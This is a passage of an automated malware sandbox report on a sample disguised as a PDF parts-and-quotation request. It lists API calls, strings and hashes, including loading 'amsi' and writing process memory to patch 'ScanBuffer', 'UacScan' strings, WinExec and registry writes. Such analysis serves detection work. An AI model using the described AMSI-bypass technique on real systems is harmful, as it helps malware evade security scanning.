                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID: " $0`
                                                                  • API String ID: 3472027048-882542589
                                                                  • Opcode ID: 1c135ebe10300abb391485aebd8d18c1cf8e436b99e592c65ce83e3a38b8fb4f
                                                                  • Instruction ID: 6151d1dcc000b0983bd9a4d559ef48f0b548b6cd94e73f8f8fe6e490f675a6b9
                                                                  • Opcode Fuzzy Hash: 1c135ebe10300abb391485aebd8d18c1cf8e436b99e592c65ce83e3a38b8fb4f
                                                                  • Instruction Fuzzy Hash: 54B1F376B053618BDB15CF28E884366BBE1EF85314F188ABAD98D8B385D770A451CB90

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • Sleep.KERNEL32(00000000,?), ref: 02951B17
                                                                  • Sleep.KERNEL32(0000000A,00000000,?), ref: 02951B31
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID: 0`
                                                                  • API String ID: 3472027048-3339448193
                                                                  • Opcode ID: 73d3cf3fb79326c2f7fdf8313f0b24116f61590ee1fa4c361af7452b6f4fddd8
                                                                  • Instruction ID: 5d6578958f171b98a8b7f78ac8c81cdce120d245e789491de90f9620931c87d0
                                                                  • Opcode Fuzzy Hash: 73d3cf3fb79326c2f7fdf8313f0b24116f61590ee1fa4c361af7452b6f4fddd8
                                                                  • Instruction Fuzzy Hash: 3451D071B053608FE715CF68C984766BBD4AF85318F1889AEEC4CCB296E770D845CB91

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(amsi), ref: 02968715
                                                                    • Part of subcall function 029680C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02968150,?,?,00000000,00000000,?,02968069,00000000,KernelBASE,00000000,00000000,02968090), ref: 02968115
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0296811B
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(?,?), ref: 0296812D
                                                                    • Part of subcall function 02967D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02967D74
                                                                  • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02968774
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                  • String ID: DllGetClassObject$W$amsi
                                                                  • API String ID: 941070894-2671292670
                                                                  • Opcode ID: 2b054eedae0d6d33e86ca68dcf4fc011e504a6202507c9511debb8a33aedb8ad
                                                                  • Instruction ID: 202dca58332b8293a8a1d9a5bd1b9164fdcbe93f457045a18b4457c91ab68617
                                                                  • Opcode Fuzzy Hash: 2b054eedae0d6d33e86ca68dcf4fc011e504a6202507c9511debb8a33aedb8ad
                                                                  • Instruction Fuzzy Hash: F2F0A45014C38179E201E6B48C49F5FBECD4BD2224F448F5CF1E8562D2D675D1058767

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0296E436
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: CheckConnectionInternet
                                                                  • String ID: Initialize$OpenSession$ScanBuffer
                                                                  • API String ID: 3847983778-3852638603
                                                                  • Opcode ID: a35d9d3829494dfa0340f7602f0bd70010be48af821cae36d11615b3b96d2afe
                                                                  • Instruction ID: dc6531afabb4911c545c3b29fa05a42f28a4288415c8ab0f6157ebba6474aba8
                                                                  • Opcode Fuzzy Hash: a35d9d3829494dfa0340f7602f0bd70010be48af821cae36d11615b3b96d2afe
                                                                  • Instruction Fuzzy Hash: 03413F35B502189BEB50EFB4C851EAEB3FAFFCC710F215421E485A7640DA74AD458FA0
                                                                  APIs
                                                                    • Part of subcall function 02968020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02968090,?,?,00000000,?,02967A06,ntdll,00000000,00000000,02967A4B,?,?,00000000), ref: 0296805E
                                                                    • Part of subcall function 02968020: GetModuleHandleA.KERNELBASE(?), ref: 02968072
                                                                    • Part of subcall function 029680C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02968150,?,?,00000000,00000000,?,02968069,00000000,KernelBASE,00000000,00000000,02968090), ref: 02968115
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0296811B
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(?,?), ref: 0296812D
                                                                  • WinExec.KERNEL32(?,?), ref: 02968478
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc$Exec
                                                                  • String ID: Kernel32$WinExec
                                                                  • API String ID: 2292790416-3609268280
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02965CFC,?,?,02963888,00000001), ref: 02965C10
                                                                  • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02965CFC,?,?,02963888,00000001), ref: 02965C3E
                                                                    • Part of subcall function 02957D18: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02963888,02965C7E,00000000,02965CFC,?,?,02963888), ref: 02957D66
                                                                    • Part of subcall function 02957F20: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02963888,02965C99,00000000,02965CFC,?,?,02963888,00000001), ref: 02957F3F
                                                                  • GetLastError.KERNEL32(00000000,02965CFC,?,?,02963888,00000001), ref: 02965CA3
                                                                    • Part of subcall function 0295A700: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,0295C361,00000000,0295C3BB), ref: 0295A71F
                                                                  Similarity
                                                                  • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                  • String ID:
                                                                  • API String ID: 503785936-0
                                                                  APIs
                                                                  • RegOpenKeyA.ADVAPI32(?,00000000,02AA5914), ref: 0296E704
                                                                  • RegSetValueExA.ADVAPI32(00000868,00000000,00000000,00000001,00000000,0000001C,00000000,0296E76F), ref: 0296E73C
                                                                  • RegCloseKey.ADVAPI32(00000868,00000868,00000000,00000000,00000001,00000000,0000001C,00000000,0296E76F), ref: 0296E747
                                                                  Similarity
                                                                  • API ID: CloseOpenValue
                                                                  • String ID:
                                                                  • API String ID: 779948276-0
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: ClearVariant
                                                                  • String ID:
                                                                  • API String ID: 1473721057-0
                                                                  APIs
                                                                  • SysFreeString.OLEAUT32(0296E950), ref: 02954C1A
                                                                  • SysAllocStringLen.OLEAUT32(?,?), ref: 02954D07
                                                                  • SysFreeString.OLEAUT32(00000000), ref: 02954D19
                                                                  Similarity
                                                                  • API ID: String$Free$Alloc
                                                                  • String ID:
                                                                  • API String ID: 986138563-0
                                                                  APIs
                                                                  • SysFreeString.OLEAUT32(?), ref: 02967362
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: FreeString
                                                                  • String ID: H
                                                                  • API String ID: 3341692771-2852464175
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(00000000,00000000,0296890B), ref: 02968858
                                                                    • Part of subcall function 02968020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02968090,?,?,00000000,?,02967A06,ntdll,00000000,00000000,02967A4B,?,?,00000000), ref: 0296805E
                                                                    • Part of subcall function 02968020: GetModuleHandleA.KERNELBASE(?), ref: 02968072
                                                                    • Part of subcall function 029680C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02968150,?,?,00000000,00000000,?,02968069,00000000,KernelBASE,00000000,00000000,02968090), ref: 02968115
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0296811B
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(?,?), ref: 0296812D
                                                                    • Part of subcall function 02967D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02967D74
                                                                  • FreeLibrary.KERNEL32(74B30000,00000000,029B1388,Function_000065D8,00000004,029B1398,029B1388,05F5E0FF,00000040,029B139C,74B30000,00000000,00000000,00000000,00000000,0296890B), ref: 029688EB
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressLibraryProc$FreeLoadMemoryVirtualWrite
                                                                  • String ID:
                                                                  • API String ID: 3283153180-0
                                                                  APIs
                                                                  • VariantCopy.OLEAUT32(00000000,00000000), ref: 0295E709
                                                                    • Part of subcall function 0295E2EC: VariantClear.OLEAUT32(?), ref: 0295E2FB
                                                                  Similarity
                                                                  • API ID: Variant$ClearCopy
                                                                  • String ID:
                                                                  • API String ID: 274517740-0
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02951A03,?,02952000), ref: 029515E2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID: 0`
                                                                  • API String ID: 4275171209-3339448193
                                                                  • Opcode ID: ee0e76aa8867dbe6aa48e7e5e98e774756b81ffdd27208e4c79c3457c6bae8f2
                                                                  • Instruction ID: ff37fde8f06fcba9f66fb5ca4edff5822f2fb35d99f6023e18b19e29dfdc96c9
                                                                  • Opcode Fuzzy Hash: ee0e76aa8867dbe6aa48e7e5e98e774756b81ffdd27208e4c79c3457c6bae8f2
                                                                  • Instruction Fuzzy Hash: A4F06DF0B453004FEB45CF7999543217BD6EB89344F108579D749DB398E77198028B80
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: InitVariant
                                                                  • String ID:
                                                                  • API String ID: 1927566239-0
                                                                  • Opcode ID: 5671632c9151a8487102b77d5dac057b45480ad17cead370301c11d402be58b2
                                                                  • Instruction ID: 6e877e0237c53cf79b2ace894c4d92a1694dfeff792b295e0c8da03f9b3fa094
                                                                  • Opcode Fuzzy Hash: 5671632c9151a8487102b77d5dac057b45480ad17cead370301c11d402be58b2
                                                                  • Instruction Fuzzy Hash: 97314D71B04228AFDB10DFA8C984ABE77EDEB4C204F444561ED89D7240D736DA51CBA2
                                                                  APIs
                                                                  • CLSIDFromProgID.OLE32(00000000,?,00000000,02966D41,?,?,?,00000000), ref: 02966D21
                                                                    • Part of subcall function 02954C0C: SysFreeString.OLEAUT32(0296E950), ref: 02954C1A
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: FreeFromProgString
                                                                  • String ID:
                                                                  • API String ID: 4225568880-0
                                                                  • Opcode ID: ee086f6a0b307bfec2e0e77caaeef10a94444e832787f3a92919830e3a1c8861
                                                                  • Instruction ID: bf6de451adb4eda2524f235f69251b72447512f62dc7efc82b142a759f4bbeac
                                                                  • Opcode Fuzzy Hash: ee086f6a0b307bfec2e0e77caaeef10a94444e832787f3a92919830e3a1c8861
                                                                  • Instruction Fuzzy Hash: A3E06D31704718BBEB01EBA1CC519AA77FEEFC9B10B914471E801D3650DA78AE009AA0
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(02950000,?,00000105), ref: 02955832
                                                                    • Part of subcall function 02955A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02950000,0297D790), ref: 02955A94
                                                                    • Part of subcall function 02955A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02950000,0297D790), ref: 02955AB2
                                                                    • Part of subcall function 02955A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02950000,0297D790), ref: 02955AD0
                                                                    • Part of subcall function 02955A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02955AEE
                                                                    • Part of subcall function 02955A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02955B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02955B37
                                                                    • Part of subcall function 02955A78: RegQueryValueExA.ADVAPI32(?,02955CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02955B7D,?,80000001), ref: 02955B55
                                                                    • Part of subcall function 02955A78: RegCloseKey.ADVAPI32(?,02955B84,00000000,?,?,00000000,02955B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02955B77
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: Open$FileModuleNameQueryValue$Close
                                                                  • String ID:
                                                                  • API String ID: 2796650324-0
                                                                  • Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                  • Instruction ID: 1d5fa99ff95bde464dac3395688bb520bb77b7d3575fe66c0a1421fe51bcbf15
                                                                  • Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                  • Instruction Fuzzy Hash: 48E06571A002248BCB10DE6888C0B8637D8AB08754F8109A5ED58DF34BD3B0ED208BE0
                                                                  APIs
                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02957DB0
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite
                                                                  • String ID:
                                                                  • API String ID: 3934441357-0
                                                                  • Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                  • Instruction ID: 158628beeb5cfa7afd5cfc70ebab1e2062d880623d7e529bbe47e278165d6dba
                                                                  • Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                  • Instruction Fuzzy Hash: FED05B723091107AD220D95E5C44EF79BDCCFC9770F100639BA58C3180D7208C018771
                                                                  APIs
                                                                  • GetFileAttributesA.KERNEL32(00000000,?,0296F8CC,ScanString,029B137C,0297AFD8,OpenSession,029B137C,0297AFD8,ScanString,029B137C,0297AFD8,UacScan,029B137C,0297AFD8,UacInitialize), ref: 02957E23
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: 39d99aea2b4b3de8ff8324b5e373e5cbc7456bababb3b7d58f404b20ec88a84a
                                                                  • Instruction ID: d9fe8ddb0b8547453be38665da7c14d31ffacbaab9b4cb95aaaa0ab8a4ab82ff
                                                                  • Opcode Fuzzy Hash: 39d99aea2b4b3de8ff8324b5e373e5cbc7456bababb3b7d58f404b20ec88a84a
                                                                  • Instruction Fuzzy Hash: 55C08CE13123200A5A90E5FC0CC408A828C19841393A41B35FC38C62E2D321A89B26A0
                                                                  APIs
                                                                  • GetFileAttributesA.KERNEL32(00000000,?,02972A49,ScanString,029B137C,0297AFD8,OpenSession,029B137C,0297AFD8,ScanBuffer,029B137C,0297AFD8,OpenSession,029B137C,0297AFD8,Initialize), ref: 02957E47
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: d4a25932c1186a40cb6d5613e0fc1b23b5cf5f8b84d23e416c631f776c8215f9
                                                                  • Instruction ID: 76c4e9713a4e37da72f82411e6978c1b0166060fc9df9c70ece08fca44eec693
                                                                  • Opcode Fuzzy Hash: d4a25932c1186a40cb6d5613e0fc1b23b5cf5f8b84d23e416c631f776c8215f9
                                                                  • Instruction Fuzzy Hash: B8C08CE03023240E5E90E6FC1CC42DE828E19845343A02B21EC38D61E2D31198AB2A10
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: FreeString
                                                                  • String ID:
                                                                  • API String ID: 3341692771-0
                                                                  • Opcode ID: ec55763b5f82d1328600eb73f4eb151786d68f8a69a22224f81dbc62eca26ecd
                                                                  • Instruction ID: e32b1b34c6e0fc4d05e61c32d1fbcadf072d466876b3967b6eaa348cc3419913
                                                                  • Opcode Fuzzy Hash: ec55763b5f82d1328600eb73f4eb151786d68f8a69a22224f81dbc62eca26ecd
                                                                  • Instruction Fuzzy Hash: D0C012A270023447EB61DE98ECC079562DCDB85295B1410A1D808D7340E7609C404B65
                                                                  APIs
                                                                  • SysFreeString.OLEAUT32(0296E950), ref: 02954C1A
                                                                  • SysReAllocStringLen.OLEAUT32(0297BE78,0296E950,000000B4), ref: 02954C62
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: String$AllocFree
                                                                  • String ID:
                                                                  • API String ID: 344208780-0
                                                                  • Opcode ID: 34a044716cc047832c89a5cdbf8a1cf543af0314eed8eb6eb3cc9569b15b6366
                                                                  • Instruction ID: 90f16fdedf294cf5d3d2552e39231853714c2d66b75f34dc1a1602f931eb9d65
                                                                  • Opcode Fuzzy Hash: 34a044716cc047832c89a5cdbf8a1cf543af0314eed8eb6eb3cc9569b15b6366
                                                                  • Instruction Fuzzy Hash: BFD012747001215DAB6CDE59C944A7A62BE99D0206349E65D9C064E240E7618480CB31
                                                                  APIs
                                                                  • timeSetEvent.WINMM(00002710,00000000,0297BB44,00000000,00000001), ref: 0297BB60
                                                                  Memory Dump Source
